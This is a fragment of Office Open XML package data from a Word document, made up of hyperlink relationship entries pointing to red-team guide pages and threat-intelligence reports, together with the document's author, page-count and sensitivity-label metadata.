Target="https://media.kasperskycontenthub.com/wp-content/uploads/sites/58/2018/03/09092926/EB-YetiJuly2014-Public.pdf" TargetMode="External"/><Relationship Id="rId187" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://redteam.guide/docs/Exercises/threat-profile/" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/numbering" Target="numbering.xml"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://redteam.guide/docs/Planning/goal-planning" TargetMode="External"/><Relationship Id="rId49" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://redteam.guide/docs/Templates/report_template" TargetMode="External"/><Relationship Id="rId114" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://redteam.guide/docs/Threat%20Profiles/cybersnake" TargetMode="External"/><Relationship Id="rId60" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://redteam.guide/docs/Templates/report_template" TargetMode="External"/><Relationship Id="rId81" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="mailto:james@iheartredteams.com" TargetMode="External"/><Relationship Id="rId135" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://redteam.guide/docs/Exercises/mindset-challege/" TargetMode="External"/><Relationship Id="rId156" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://redteam.guide/docs/Exercises/threat-profile/" TargetMode="External"/><Relationship Id="rId177" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/Dragonfly_Threat_Against_Western_Energy_Suppliers.pdf" TargetMode="External"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://redteam.guide/docs/Concepts/red-vs-pen-vs-vuln" TargetMode="External"/><Relationship Id="rId39" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://redteam.guide/docs/Planning/red-team-tradecraf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821</TotalTime>
  <Pages>54</Pages>
  <Words>13788</Words>
  <Characters>78598</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>654</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Bhabesh Kumar Das</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Bhabesh Kumar Das</cp:lastModifiedBy>
  <cp:revision>9</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2024-07-06T12:31:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-07-07T02:13:00Z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1,2,3</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="3" name="ClassificationContentMarkingFooterFontProps">
    <vt:lpwstr>#626469,6,Calibri</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="4" name="ClassificationContentMarkingFooterText">
    <vt:lpwstr>General</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="5" name="MSIP_Label_57443d00-af18-408c-9335-47b5de3ec9b9_Enabled">
    <vt:lpwstr>true</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="6" name="MSIP_Label_57443d00-af18-408c-9335-47b5de3ec9b9_SetDate">
    <vt:lpwstr>2024-07-06T12:31:59Z</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="7" name="MSIP_Label_57443d00-af18-408c-9335-47b5de3ec9b9_Method">
    <vt:lpwstr>Privileged</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="8" name="MSIP_Label_57443d00-af18-408c-9335-47b5de3ec9b9_Name">
    <vt:lpwstr>General v2</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="9" name="MSIP_Label_57443d00-af18-408c-9335-47b5de3ec9b9_SiteId">
    <vt:lpwstr>6e51e1ad-c54b-4b39-b598-0ffe9ae68fef</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="10" name="MSIP_Label_57443d00-af18-408c-9335-47b5de3ec9b9_ActionId">
    <vt:lpwstr>b5a42df3-554a-45a4-9fc3-4ce5cdb06752</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="11" name="MSIP_Label_57443d00-af18-408c-9335-47b5de3ec9b9_ContentBits">
    <vt:lpwstr>2</vt:lpwstr>
  </property>
</Properties>
</file>